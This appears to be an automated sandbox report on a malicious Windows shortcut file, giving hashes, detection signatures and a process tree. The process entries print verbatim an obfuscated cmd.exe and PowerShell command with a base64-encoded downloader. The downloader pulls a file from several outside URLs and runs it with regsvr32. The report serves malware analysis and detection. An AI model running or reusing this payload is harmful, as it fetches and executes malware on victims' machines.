Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2024 11:03

General

  • Target

    b22ec84aa47a96fcc20d782d74a3f16f915e455a30d1178f4fad1466633f0b55.lnk

  • Size

    2KB

  • MD5

    fbddf679b584e0f043673397d8642215

  • SHA1

    d1e2a9b2591560b075626140a51f3abbdce61a74

  • SHA256

    b22ec84aa47a96fcc20d782d74a3f16f915e455a30d1178f4fad1466633f0b55

  • SHA512

    7159c50d5532c69b526043ebacb1ccc8690823b67e45422263b9a2dd736ddb50020e136b3d8bf6f1ac95f92901f62de81f778da8fb1120c6c76b594e045d5ff2

Score
6/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\b22ec84aa47a96fcc20d782d74a3f16f915e455a30d1178f4fad1466633f0b55.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1644
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /v:on /c FNBmwxR6QxBkrgJ+BX6Miv/JjezYHuOEw18Vc+d4q4lm2Szx6nmR8zgeg19If6ewK09230Kh||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$Br='ICAgICAgIFdyaXRlLUhvc3QgInVQTlNJIjskUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vd3d3LmpwcmFydHMuY29tL3NzbC9ROFY5NTBIRm01NnlVUG5RaEEvIiwiaHR0cDovL3JlZG1hZy1kei5jb20vam9vbWxhL0s2NnMxSVU5aC8iLCJodHRwOi8vcmV6YS1raGFsYWouY29tL2F3c3RhdHMvd0U2YmN6SWUycC8iLCJodHRwOi8vd3d3Lmpzb25zaW50bC5jb20vUnhzR2dvVld6OS8iLCJodHRwczovL29ycXVlc3RhbWVkaWEuY29tL0ZhY2Vib29rL2x1VXN5a1JrVC8iLCJodHRwOi8vcGlmZmwuY29tL3BpZmZsLmNvbS9SZFMwdWVrNURNZEUwMHkvIik7JHQ9IkloVXlNIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEFNemJmdGl4bkguV05UO1JlZ3N2cjMyLmV4ZSAiJGRcQU16YmZ0aXhuSC5XTlQiO2JyZWFrfSBjYXRjaCB7IH19';$Oh=[System.Convert]::FromBase64String($Br);$Xr=[System.Text.Encoding]::ASCII.GetString($Oh); iex ($Xr)}"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -c "&{$Br='ICAgICAgIFdyaXRlLUhvc3QgInVQTlNJIjskUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vd3d3LmpwcmFydHMuY29tL3NzbC9ROFY5NTBIRm01NnlVUG5RaEEvIiwiaHR0cDovL3JlZG1hZy1kei5jb20vam9vbWxhL0s2NnMxSVU5aC8iLCJodHRwOi8vcmV6YS1raGFsYWouY29tL2F3c3RhdHMvd0U2YmN6SWUycC8iLCJodHRwOi8vd3d3Lmpzb25zaW50bC5jb20vUnhzR2dvVld6OS8iLCJodHRwczovL29ycXVlc3RhbWVkaWEuY29tL0ZhY2Vib29rL2x1VXN5a1JrVC8iLCJodHRwOi8vcGlmZmwuY29tL3BpZmZsLmNvbS9SZFMwdWVrNURNZEUwMHkvIik7JHQ9IkloVXlNIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEFNemJmdGl4bkguV05UO1JlZ3N2cjMyLmV4ZSAiJGRcQU16YmZ0aXhuSC5XTlQiO2JyZWFrfSBjYXRjaCB7IH19';$Oh=[System.Convert]::FromBase64String($Br);$Xr=[System.Text.Encoding]::ASCII.GetString($Oh); iex ($Xr)}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1636

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1636-40-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp

    Filesize

    4KB

  • memory/1636-41-0x000000001B610000-0x000000001B8F2000-memory.dmp

    Filesize

    2.9MB

  • memory/1636-42-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

  • memory/1636-43-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

    Filesize

    9.6MB

  • memory/1636-44-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

    Filesize

    9.6MB

  • memory/1636-45-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

    Filesize

    9.6MB

  • memory/1636-46-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

    Filesize

    9.6MB

  • memory/1636-47-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

    Filesize

    9.6MB